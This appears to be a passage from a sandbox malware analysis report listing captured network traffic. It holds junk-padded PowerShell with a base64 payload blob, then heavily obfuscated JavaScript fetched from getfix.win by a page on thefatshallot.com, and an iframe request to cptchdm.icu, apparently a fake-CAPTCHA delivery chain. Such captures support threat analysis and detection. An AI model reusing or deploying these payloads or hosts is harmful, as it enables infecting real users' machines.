-Milliseconds 1 } function rONr() { $tempVar = "KEXjx" return $tempVar } function TjDK() { $tempVar = "rQleT" return $tempVar } $XSHaEhmAmNoLLkI = 278 # Random assignment foreach ($ZVEYnTXYWnJOkho in 1..2) { $hEpPjvTVMTlaqhi = 970; Start-Sleep -Milliseconds 1 } foreach ($elacXPSkjGtBzHJ in 1..2) { $HlEgUTWWJxubQEH = 805; Start-Sleep -Milliseconds 1 } $VNtfDbecIbEvDWg = 425 # Random assignment if (770 -eq 770) { $JnSyXKGlVeEeiBE = "MEMGQdyzi" } foreach ($KkYFwsJroebJcZS in 1..2) { $OllKVAmOQnyYrpd = 343; Start-Sleep -Milliseconds 1 } function cdaC() { $tempVar = "sIKZO" return $tempVar } if (201 -eq 201) { $ZRAdEpnIFLojmSV = "GqqySgTVO" } [void]([System.Text.Encoding]::UTF8.GetBytes("iQbSRTZqIhou")) foreach ($gjpIwRzyDyvezmw in 1..2) { $TEmQdDzTgdizWzT = 321; [TRUNCATED]
Oct 17, 2025 08:52:57.746159077 CEST	1358	IN	Data Raw: 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 42 64 70 73 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 74 65 6d 70 56 61 72 20 3d 20 22 66 57 6d 49 63 22 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 24 74 65 6d 70 56 61 72 0d 0a 20 20 20 Data Ascii: function Bdps() { $tempVar = "fWmIc" return $tempVar } $DvLMvhMzmwfKsqYy = @(6513, 9735, 6913, 5045, 9664, 3070, 4563, 6837, 2364, 9613, 4530, 1854, 3298, 2801, 7818, 3986, 9015, 1733, 4251, 6690, 3182, 880
Oct 17, 2025 08:52:57.746171951 CEST	1358	IN	Data Raw: 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 6a 6f 72 59 4a 6b 58 32 45 2f 36 6f 69 72 74 32 6f 6d 35 4c 37 70 36 33 38 63 41 6d 67 4a 42 69 55 77 72 71 32 6d 55 44 42 38 30 69 53 68 52 43 44 69 4e 57 6b 35 48 5a 6d 71 64 43 31 6d 65 Data Ascii: :FromBase64String("jorYJkX2E/6oirt2om5L7p638cAmgJBiUwrq2mUDB80iShRCDiNWk5HZmqdC1men3r66x80NXw76ddI7CziYpYPuU1dZCOB7YF4uTOXoIHyiQvynSD//FesGSJlQG4dZQfUkU4MQTdXeP2Zv3hIoEVVVmMk78FxD7j5sU79HKkXX1QvwxMz5kvUnyQjZkDbY3TdD+4K9HlCY4GVEo/kWlhQglwkGOEyI
Oct 17, 2025 08:52:57.746186972 CEST	1358	IN	Data Raw: 38 75 37 31 70 68 68 71 4e 31 67 6c 5a 54 37 64 43 6c 44 78 4c 72 75 55 75 36 71 53 65 79 62 62 4f 46 57 76 6f 6f 73 7a 4e 65 62 67 50 43 4e 47 43 47 4f 75 56 32 6b 68 49 5a 77 43 46 41 2b 38 54 6f 5a 61 30 48 68 74 38 6e 66 49 47 6d 33 43 75 70 Data Ascii: 8u71phhqN1glZT7dClDxLruUu6qSeybbOFWvooszNebgPCNGCGOuV2khIZwCFA+8ToZa0Hht8nfIGm3CupDM9i9X/M4xryJX5mBBcVWG2SBJ81QE1GVuckmrfe3175jUUC9wrhs9jqNgAuoULH0iQUFJdMs8xB3J5YqAijE0YfrHaSEmFisJCGCwpNV7WkHMiTioqHbNl4gRqsSMvQByK5zzTMNf+C8WQGxmjCNETo9Is/z0i7m
Oct 17, 2025 08:52:57.746222973 CEST	1358	IN	Data Raw: 71 64 79 48 6f 55 78 71 49 52 78 43 52 51 47 53 59 32 66 68 56 7a 39 38 6a 68 78 73 65 4c 48 37 62 47 2f 30 6d 61 30 6b 67 70 42 43 6c 41 32 75 30 68 31 70 39 6b 57 58 4d 2f 4d 58 4a 76 2f 6e 35 56 32 30 58 58 46 51 51 58 46 71 7a 48 54 63 64 55 Data Ascii: qdyHoUxqIRxCRQGSY2fhVz98jhxseLH7bG/0ma0kgpBClA2u0h1p9kWXM/MXJv/n5V20XXFQQXFqzHTcdUdvXYKxD89ackTh0peW1QT+5AWwDLRPcGUe8lLcBAXoTYD+J9YwphbwTbLYkkqZuawsa+gvbCjS3+0dUh18vi5/OYUW2K0ujn4uv78Btt4ahXjmr9hd+OFYK0gpExP5c8+EmZjFguE+/Z1pwOyp0WkPAszklc4WIQC
Oct 17, 2025 08:52:57.746236086 CEST	1358	IN	Data Raw: 59 67 4b 62 51 4b 2b 37 43 58 48 6c 4f 6b 56 41 65 57 76 51 50 2b 64 39 68 71 42 79 6b 4d 39 48 39 43 53 34 33 54 6e 77 48 34 64 46 46 71 42 44 34 6a 7a 47 5a 79 4f 33 50 75 7a 42 46 45 50 55 51 57 45 67 49 47 36 76 2b 4d 30 7a 55 30 79 48 41 69 Data Ascii: YgKbQK+7CXHlOkVAeWvQP+d9hqBykM9H9CS43TnwH4dFFqBD4jzGZyO3PuzBFEPUQWEgIG6v+M0zU0yHAiw79RrB/2LLjF2qtyOAv1XiguPk4JvUz/8UmRnTEI7wP2Dze0nSAxTdDLEDeW1LLz17TMxooh2QYyUfqWZI9H/OunfCjUAMDIPLC9Pq0VaRzWncW8PCh51DYxQgtlmylBgxNL71iKH5bzxMnZpNqY3Sjd/4bJi8DDb
Oct 17, 2025 08:52:57.746248007 CEST	1358	IN	Data Raw: 6b 55 74 31 4c 46 73 37 30 55 4f 36 75 42 2b 59 31 33 5a 52 33 65 6c 47 6c 57 7a 58 73 4d 67 53 4f 76 49 39 35 55 6f 2f 57 36 34 70 37 65 74 73 33 71 74 6a 76 44 61 58 62 63 56 30 46 43 47 75 4e 30 44 6a 72 73 61 4d 72 69 43 44 59 76 46 6f 2f 65 Data Ascii: kUt1LFs70UO6uB+Y13ZR3elGlWzXsMgSOvI95Uo/W64p7ets3qtjvDaXbcV0FCGuN0DjrsaMriCDYvFo/ew5exyxrumLJT994tk2QEMC3ebQj+3JG+ynXX/K6bu5+v5KnfKowqU4IxJBpYvtli3dQITKmG4+MF9vyhGpgHuDhCga6+JQmdtBmGzbR7Zg+YcSLWk2ryJQTG2TOTiTTmKW/iFjkupLTOapiMABIuipDtBKl5LSTNT
Oct 17, 2025 08:52:57.746259928 CEST	1358	IN	Data Raw: 65 7a 35 6c 57 33 48 49 70 43 44 4f 41 32 5a 72 6b 75 6a 65 36 58 31 44 4f 62 2f 34 52 45 38 63 72 58 2b 31 4f 6e 39 34 55 47 6a 74 48 46 4e 51 49 75 43 33 54 42 6e 52 5a 6e 41 4e 6e 6f 69 70 47 48 44 4e 68 32 4f 63 51 44 62 7a 52 4b 33 79 46 32 Data Ascii: ez5lW3HIpCDOA2Zrkuje6X1DOb/4RE8crX+1On94UGjtHFNQIuC3TBnRZnANnoipGHDNh2OcQDbzRK3yF2mlUa79fnaZjsaYj+2iKuHfEw73DCIOrs0FTNgcYN4ywTSwLBDBECASE4mqMPd1+hlRFDWi+wtLmqbh9C2aeS3oacq48frNGf7q5PyUYHnVk1a+y0ikk8otZJVp4x/2e5ZbwcssuQQeh/o6tBYOtzYpCGDW263hQ9Y
Oct 17, 2025 08:52:57.746273041 CEST	1358	IN	Data Raw: 43 78 45 52 6e 59 76 53 56 52 34 45 4e 76 75 73 67 79 73 75 61 4f 56 65 54 63 6f 74 59 59 48 35 36 33 33 38 54 48 39 69 41 78 66 52 76 36 78 6d 76 6a 71 45 43 75 63 52 75 55 4d 42 68 7a 42 63 76 75 66 65 2f 7a 32 32 67 61 6c 50 46 37 49 4f 46 63 Data Ascii: CxERnYvSVR4ENvusgysuaOVeTcotYYH56338TH9iAxfRv6xmvjqECucRuUMBhzBcvufe/z22galPF7IOFcje4fPjmsO+x+qq2kMjG+h++CQNn81XQwPaGv3C12aIdjUectdPHewsnbc9NCS6k6XBEF9NwHY7R16vyYAFvDCEImRNxOjQ75p34MIWGg8fH4dYAYbHOnW+4uu43xRsJyGGuRGAbI688CDFFh+z5S0PkOn4rbppvSg
Oct 17, 2025 08:52:57.746290922 CEST	1358	IN	Data Raw: 37 53 39 44 4b 72 62 56 6e 41 79 4f 45 50 69 4d 38 6e 36 39 64 59 70 35 73 54 64 54 56 76 45 6a 66 74 73 64 6a 6a 7a 78 52 41 68 33 65 42 55 68 72 41 4b 30 53 4e 5a 30 31 50 36 42 34 6a 55 45 32 2f 39 71 67 62 72 39 73 35 59 36 49 36 2f 66 74 42 Data Ascii: 7S9DKrbVnAyOEPiM8n69dYp5sTdTVvEjftsdjjzxRAh3eBUhrAK0SNZ01P6B4jUE2/9qgbr9s5Y6I6/ftBHPmMjsFXZpm8mHwWhg3oH2nZimGLZBisZRech+54xW2JDEpTg1lcy+nzw14rxOnNUUR4ITNZ9bihICmp+p6rQ9MOTbmDVJvQvP53l2D6QGBtj3aqAKR6bxbRsmMvstELCL+LHbdwCfyop6Q04h4X5t/JfCtoAQMul
Oct 17, 2025 08:52:57.776078939 CEST	1358	IN	Data Raw: 64 2f 67 55 36 64 63 53 2f 51 36 77 4d 4c 54 53 37 33 74 51 2f 69 53 4a 75 43 31 64 75 63 67 4a 79 53 45 33 47 6e 49 70 78 71 65 68 74 4b 77 57 41 79 47 57 37 56 59 66 71 35 7a 6f 37 2b 39 50 76 59 54 51 4f 30 49 50 31 62 33 77 43 79 43 32 47 2b Data Ascii: d/gU6dcS/Q6wMLTS73tQ/iSJuC1ducgJySE3GnIpxqehtKwWAyGW7VYfq5zo7+9PvYTQO0IP1b3wCyC2G+LchmnNMXrPersC8sqXPg4rINlxp5ytGYslUd8uJjfBIJGzAuVy2760gALJzQi3eJdvxOoHRHQGL6zep59b4VSDAdI44/to+AVavOdZowxCrdkHviEN+ZxdrRN4lDPfGN7uRss2fpScBwykrMdM7ExgW/nGVCMztQh

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:36 UTC	596	OUT	GET /jsrepo?rnd=0.11634913867038876&ts=1760683896011 HTTP/1.1 Host: getfix.win Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://thefatshallot.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://thefatshallot.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:37 UTC	567	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 17 Oct 2025 06:51:36 GMT Content-Type: application/javascript; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: * Set-Cookie: 053547622c34ce11f77d337a4818af78=YTo0OntpOjA7aTowO2k6MTtpOjE7aToyO2E6Mjp7aTowO2k6MTtpOjE7aTowO31pOjM7aToxNzYzMjc1ODk2O30%3D; expires=Sun, 16 Nov 2025 06:51:36 GMT; Max-Age=2592000; path=/; HttpOnly; SameSite=Lax Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0 Pragma: no-cache Expires: 0 Content-Length: 95958
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 64 64 66 65 64 2c 5f 30 78 34 38 37 33 65 36 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 64 36 65 63 28 5f 30 78 32 63 61 36 33 63 2c 5f 30 78 31 32 39 31 66 63 2c 5f 30 78 31 30 63 64 30 35 2c 5f 30 78 33 38 31 64 31 38 2c 5f 30 78 36 61 35 38 61 61 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 38 32 28 5f 30 78 36 61 35 38 61 61 2d 30 78 32 37 65 2c 5f 30 78 31 30 63 64 30 35 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 31 37 39 66 63 28 5f 30 78 32 38 39 62 37 33 2c 5f 30 78 34 39 62 36 62 38 2c 5f 30 78 33 32 66 64 36 64 2c 5f 30 78 35 34 34 37 31 35 2c 5f 30 78 33 35 31 33 30 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 38 32 28 5f 30 78 33 32 66 64 36 64 2d 20 2d 30 78 32 65 65 2c 5f 30 78 35 34 34 37 31 Data Ascii: (function(_0x4ddfed,_0x4873e6){function _0x59d6ec(_0x2ca63c,_0x1291fc,_0x10cd05,_0x381d18,_0x6a58aa){return _0x4582(_0x6a58aa-0x27e,_0x10cd05);}function _0x1179fc(_0x289b73,_0x49b6b8,_0x32fd6d,_0x544715,_0x35130f){return _0x4582(_0x32fd6d- -0x2ee,_0x54471
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 36 2a 30 78 38 39 2b 2d 30 78 32 34 37 29 3b 69 66 28 5f 30 78 33 35 34 37 36 36 3d 3d 3d 5f 30 78 34 38 37 33 65 36 29 62 72 65 61 6b 3b 65 6c 73 65 20 5f 30 78 33 31 38 30 61 61 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 31 38 30 61 61 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 34 34 64 35 31 61 29 7b 5f 30 78 33 31 38 30 61 61 5b 27 70 75 73 68 27 5d 28 5f 30 78 33 31 38 30 61 61 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 34 61 33 33 2c 2d 30 78 34 34 66 61 33 2b 2d 30 78 61 34 2a 30 78 32 32 66 2b 2d 30 78 32 2a 2d 30 78 34 31 34 63 64 29 29 3b 63 6f 6e 73 74 20 5f 30 78 33 65 37 38 64 63 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 64 36 35 35 63 28 5f 30 78 34 63 66 63 31 63 2c Data Ascii: 60x89+-0x247);if(_0x354766===_0x4873e6)break;else _0x3180aa['push'](_0x3180aa['shift']());}catch(_0x44d51a){_0x3180aa['push'](_0x3180aa['shift']());}}}(_0x4a33,-0x44fa3+-0xa40x22f+-0x2*-0x414cd));const _0x3e78dc=(function(){function _0x1d655c(_0x4cfc1c,
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 30 78 35 31 66 2c 30 78 35 38 36 29 2c 27 70 77 75 70 49 27 3a 5f 30 78 31 62 39 31 63 34 28 30 78 34 35 61 2c 30 78 34 66 33 2c 30 78 34 37 66 2c 30 78 35 33 66 2c 30 78 34 64 31 29 2b 5f 30 78 35 61 33 63 63 35 28 30 78 36 62 64 2c 30 78 36 37 36 2c 30 78 36 36 36 2c 30 78 35 65 39 2c 30 78 35 61 64 29 2b 27 6e 27 2c 27 65 68 71 46 5a 27 3a 5f 30 78 31 64 36 35 35 63 28 30 78 32 36 64 2c 30 78 32 31 33 2c 30 78 32 34 64 2c 30 78 32 61 35 2c 30 78 32 65 33 29 2b 5f 30 78 31 62 39 31 63 34 28 30 78 35 34 64 2c 30 78 35 39 62 2c 30 78 34 64 34 2c 30 78 35 35 33 2c 30 78 35 37 64 29 2b 5f 30 78 31 64 36 35 35 63 28 30 78 33 30 62 2c 30 78 32 64 61 2c 30 78 33 33 31 2c 30 78 32 37 39 2c 30 78 32 37 37 29 2c 27 68 67 72 6e 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 Data Ascii: 0x51f,0x586),'pwupI':_0x1b91c4(0x45a,0x4f3,0x47f,0x53f,0x4d1)+_0x5a3cc5(0x6bd,0x676,0x666,0x5e9,0x5ad)+'n','ehqFZ':_0x1d655c(0x26d,0x213,0x24d,0x2a5,0x2e3)+_0x1b91c4(0x54d,0x59b,0x4d4,0x553,0x57d)+_0x1d655c(0x30b,0x2da,0x331,0x279,0x277),'hgrnN':function(
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 65 28 30 78 33 61 38 2c 30 78 33 62 34 2c 30 78 33 64 36 2c 30 78 33 32 35 2c 30 78 32 63 66 29 5d 2c 27 68 46 44 68 6a 27 3a 5f 30 78 32 33 31 32 62 32 5b 5f 30 78 35 63 38 36 63 65 28 30 78 33 34 36 2c 30 78 33 32 64 2c 30 78 33 63 39 2c 30 78 33 65 30 2c 30 78 33 64 31 29 5d 2c 27 51 58 44 53 73 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 30 30 38 35 61 2c 5f 30 78 35 39 63 37 31 35 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 61 30 35 32 32 28 5f 30 78 31 30 35 61 37 63 2c 5f 30 78 33 38 35 35 32 35 2c 5f 30 78 35 34 31 66 66 33 2c 5f 30 78 33 63 30 35 30 66 2c 5f 30 78 34 64 65 65 33 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 35 66 63 35 28 5f 30 78 33 38 35 35 32 35 2d 30 78 33 37 31 2c 5f 30 78 33 38 35 35 32 35 2d 30 78 31 35 38 2c 5f 30 78 35 Data Ascii: e(0x3a8,0x3b4,0x3d6,0x325,0x2cf)],'hFDhj':_0x2312b2[_0x5c86ce(0x346,0x32d,0x3c9,0x3e0,0x3d1)],'QXDSs':function(_0x10085a,_0x59c715){function _0x2a0522(_0x105a7c,_0x385525,_0x541ff3,_0x3c050f,_0x4dee3f){return _0x455fc5(_0x385525-0x371,_0x385525-0x158,_0x5
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 78 31 65 62 34 64 61 2d 30 78 37 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 33 64 33 63 65 28 5f 30 78 34 33 62 38 39 30 2c 5f 30 78 32 38 64 32 32 38 2c 5f 30 78 31 64 35 30 35 39 2c 5f 30 78 32 64 64 62 32 64 2c 5f 30 78 33 30 38 37 34 30 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 34 66 63 39 62 28 5f 30 78 34 33 62 38 39 30 2d 30 78 61 61 2c 5f 30 78 32 64 64 62 32 64 2d 30 78 33 63 63 2c 5f 30 78 34 33 62 38 39 30 2c 5f 30 78 32 64 64 62 32 64 2d 30 78 39 32 2c 5f 30 78 33 30 38 37 34 30 2d 30 78 31 34 37 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 32 65 32 32 62 37 3d 7b 27 57 48 74 66 54 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 36 39 34 34 2c 5f 30 78 33 62 66 32 64 37 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 39 64 38 35 30 28 5f 30 78 32 63 Data Ascii: x1eb4da-0x78);}function _0x33d3ce(_0x43b890,_0x28d228,_0x1d5059,_0x2ddb2d,_0x308740){return _0x44fc9b(_0x43b890-0xaa,_0x2ddb2d-0x3cc,_0x43b890,_0x2ddb2d-0x92,_0x308740-0x147);}const _0x2e22b7={'WHtfT':function(_0x176944,_0x3bf2d7){function _0x59d850(_0x2c
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 64 2c 2d 30 78 34 37 29 5d 2c 5f 30 78 32 65 32 32 62 37 5b 5f 30 78 35 37 33 35 61 66 28 30 78 33 63 64 2c 30 78 31 63 35 2c 30 78 33 65 34 2c 30 78 32 64 61 2c 30 78 33 33 32 29 5d 29 29 5b 5f 30 78 34 63 65 64 61 62 28 2d 30 78 31 62 61 2c 2d 30 78 31 38 30 2c 30 78 35 39 2c 2d 30 78 36 61 2c 2d 30 78 61 64 29 5d 28 5f 30 78 32 65 32 32 62 37 5b 5f 30 78 34 63 65 64 61 62 28 30 78 63 35 2c 30 78 31 36 2c 30 78 32 66 2c 30 78 62 63 2c 2d 30 78 32 65 29 5d 29 29 3b 65 6c 73 65 7b 69 66 28 5f 30 78 32 30 63 63 38 66 29 7b 69 66 28 5f 30 78 32 33 31 32 62 32 5b 5f 30 78 34 63 65 64 61 62 28 2d 30 78 31 36 61 2c 2d 30 78 32 33 66 2c 2d 30 78 31 66 63 2c 2d 30 78 31 35 63 2c 2d 30 78 31 32 39 29 5d 28 5f 30 78 32 33 31 32 62 32 5b 5f 30 78 34 63 65 64 61 62 Data Ascii: d,-0x47)],_0x2e22b7[_0x5735af(0x3cd,0x1c5,0x3e4,0x2da,0x332)]))[_0x4cedab(-0x1ba,-0x180,0x59,-0x6a,-0xad)](_0x2e22b7[_0x4cedab(0xc5,0x16,0x2f,0xbc,-0x2e)]));else{if(_0x20cc8f){if(_0x2312b2[_0x4cedab(-0x16a,-0x23f,-0x1fc,-0x15c,-0x129)](_0x2312b2[_0x4cedab
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 32 37 31 2c 30 78 31 62 63 2c 30 78 31 63 61 2c 30 78 31 38 33 2c 30 78 31 39 62 29 2b 5f 30 78 33 38 30 31 34 63 28 30 78 34 61 62 2c 30 78 33 33 61 2c 30 78 34 30 36 2c 30 78 33 33 65 2c 30 78 34 37 37 29 5d 28 29 5b 5f 30 78 33 38 30 31 34 63 28 30 78 34 34 38 2c 30 78 33 38 38 2c 30 78 33 65 39 2c 30 78 33 32 64 2c 30 78 34 38 32 29 2b 27 68 27 5d 28 5f 30 78 33 62 65 66 30 66 5b 5f 30 78 32 35 63 63 39 66 28 30 78 34 61 33 2c 30 78 35 37 30 2c 30 78 35 39 63 2c 30 78 34 39 65 2c 30 78 35 30 34 29 5d 29 5b 5f 30 78 33 38 30 31 34 63 28 30 78 35 30 39 2c 30 78 34 62 33 2c 30 78 34 34 35 2c 30 78 33 38 35 2c 30 78 33 39 39 29 2b 5f 30 78 32 35 63 63 39 66 28 30 78 35 38 35 2c 30 78 35 34 39 2c 30 78 36 35 66 2c 30 78 34 63 34 2c 30 78 35 32 30 29 5d 28 Data Ascii: 271,0x1bc,0x1ca,0x183,0x19b)+_0x38014c(0x4ab,0x33a,0x406,0x33e,0x477)]()[_0x38014c(0x448,0x388,0x3e9,0x32d,0x482)+'h'](_0x3bef0f[_0x25cc9f(0x4a3,0x570,0x59c,0x49e,0x504)])[_0x38014c(0x509,0x4b3,0x445,0x385,0x399)+_0x25cc9f(0x585,0x549,0x65f,0x4c4,0x520)](
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 34 61 39 2c 30 78 35 33 34 2c 30 78 35 35 62 2c 30 78 34 33 62 29 2c 27 62 42 70 6d 64 27 3a 5f 30 78 35 62 62 65 30 34 28 30 78 32 39 35 2c 30 78 31 35 38 2c 30 78 33 30 61 2c 30 78 33 34 65 2c 30 78 32 33 38 29 2b 5f 30 78 34 35 36 65 37 39 28 30 78 33 36 32 2c 30 78 32 36 36 2c 30 78 32 39 37 2c 30 78 33 63 35 2c 30 78 33 34 36 29 2c 27 79 48 57 7a 4f 27 3a 5f 30 78 34 39 33 66 62 30 28 30 78 33 62 30 2c 30 78 33 32 34 2c 30 78 33 32 66 2c 30 78 32 64 36 2c 30 78 33 63 65 29 2c 27 5a 4f 62 72 6c 27 3a 5f 30 78 35 62 62 65 30 34 28 30 78 31 66 35 2c 30 78 31 31 33 2c 30 78 31 39 31 2c 30 78 32 32 64 2c 30 78 31 38 32 29 2b 5f 30 78 65 31 37 37 61 64 28 30 78 35 30 64 2c 30 78 35 61 34 2c 30 78 36 31 31 2c 30 78 33 66 38 2c 30 78 35 63 31 29 2c 27 41 4f Data Ascii: 4a9,0x534,0x55b,0x43b),'bBpmd':_0x5bbe04(0x295,0x158,0x30a,0x34e,0x238)+_0x456e79(0x362,0x266,0x297,0x3c5,0x346),'yHWzO':_0x493fb0(0x3b0,0x324,0x32f,0x2d6,0x3ce),'ZObrl':_0x5bbe04(0x1f5,0x113,0x191,0x22d,0x182)+_0xe177ad(0x50d,0x5a4,0x611,0x3f8,0x5c1),'AO
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 78 31 31 31 38 36 37 2c 5f 30 78 34 36 31 62 65 39 2c 5f 30 78 32 63 38 37 65 62 2c 5f 30 78 34 39 66 30 62 32 2c 5f 30 78 34 38 66 35 33 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 38 32 28 5f 30 78 34 38 66 35 33 63 2d 30 78 37 33 2c 5f 30 78 32 63 38 37 65 62 29 3b 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 35 64 34 32 2c 5f 30 78 39 61 30 64 39 31 29 7b 63 6f 6e 73 74 20 5f 30 78 35 34 33 35 32 30 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 37 62 38 66 35 28 5f 30 78 35 34 32 39 35 64 2c 5f 30 78 34 37 62 38 34 66 2c 5f 30 78 66 30 30 66 32 65 2c 5f 30 78 35 33 61 34 65 32 2c 5f 30 78 34 31 38 63 38 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 35 36 65 37 39 28 5f 30 78 35 34 32 39 35 64 2d 30 78 34 37 2c 5f 30 78 34 37 62 Data Ascii: x111867,_0x461be9,_0x2c87eb,_0x49f0b2,_0x48f53c){return _0x4582(_0x48f53c-0x73,_0x2c87eb);}return function(_0x3b5d42,_0x9a0d91){const _0x543520={};function _0x17b8f5(_0x54295d,_0x47b84f,_0xf00f2e,_0x53a4e2,_0x418c85){return _0x456e79(_0x54295d-0x47,_0x47b
2025-10-17 06:51:37 UTC	1460	IN	Data Raw: 31 38 31 36 34 64 5b 5f 30 78 34 64 33 62 37 37 28 30 78 33 39 35 2c 30 78 32 33 62 2c 30 78 33 35 32 2c 30 78 32 61 36 2c 30 78 33 34 61 29 5d 29 2c 5f 30 78 35 31 36 39 31 34 3d 21 5b 5d 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 5f 30 78 35 65 65 31 36 38 3d 5f 30 78 65 35 34 31 66 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 36 31 39 34 3d 7b 27 70 64 78 45 48 27 3a 5f 30 78 33 38 33 66 66 35 5b 5f 30 78 31 61 35 65 39 37 28 2d 30 78 62 36 2c 2d 30 78 37 34 2c 2d 30 78 61 66 2c 2d 30 78 31 35 36 2c 2d 30 78 39 65 29 5d 2c 27 46 67 4a 73 6f 27 3a 5f 30 78 33 38 33 66 66 35 5b 5f 30 78 33 65 35 30 66 61 28 30 78 61 64 2c 2d 30 78 31 33 66 2c 2d 30 78 34 31 2c 2d 30 78 33 33 2c 2d 30 78 39 29 5d 2c 27 46 55 6c 6e 4d 27 3a 5f 30 78 33 38 Data Ascii: 18164d[_0x4d3b77(0x395,0x23b,0x352,0x2a6,0x34a)]),_0x516914=![];else{const _0x5ee168=_0xe541f?function(){const _0x3a6194={'pdxEH':_0x383ff5[_0x1a5e97(-0xb6,-0x74,-0xaf,-0x156,-0x9e)],'FgJso':_0x383ff5[_0x3e50fa(0xad,-0x13f,-0x41,-0x33,-0x9)],'FUlnM':_0x38
2025-10-17 06:51:37 UTC	595	OUT	GET /jsrepo?rnd=0.3805456465715724&ts=1760683897314 HTTP/1.1 Host: getfix.win Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Origin: https://thefatshallot.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://thefatshallot.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:37 UTC	567	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 17 Oct 2025 06:51:37 GMT Content-Type: application/javascript; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: * Set-Cookie: 053547622c34ce11f77d337a4818af78=YTo0OntpOjA7aTowO2k6MTtpOjE7aToyO2E6Mjp7aTowO2k6MTtpOjE7aTowO31pOjM7aToxNzYzMjc1ODk3O30%3D; expires=Sun, 16 Nov 2025 06:51:37 GMT; Max-Age=2592000; path=/; HttpOnly; SameSite=Lax Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0 Pragma: no-cache Expires: 0 Content-Length: 95958

Timestamp	Bytes transferred	Direction	Data
2025-10-17 06:51:38 UTC	738	OUT	GET /?ref=thefatshallot.com HTTP/1.1 Host: cptchdm.icu Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Sec-Fetch-Storage-Access: active Referer: https://thefatshallot.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-10-17 06:51:38 UTC	286	IN	HTTP/1.1 200 OK Server: nginx/1.28.0 Date: Fri, 17 Oct 2025 06:51:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 364495 Connection: keep-alive Last-Modified: Thu, 09 Oct 2025 22:29:14 GMT ETag: "58fcf-640c154b0c280" Accept-Ranges: bytes Vary: Accept-Encoding
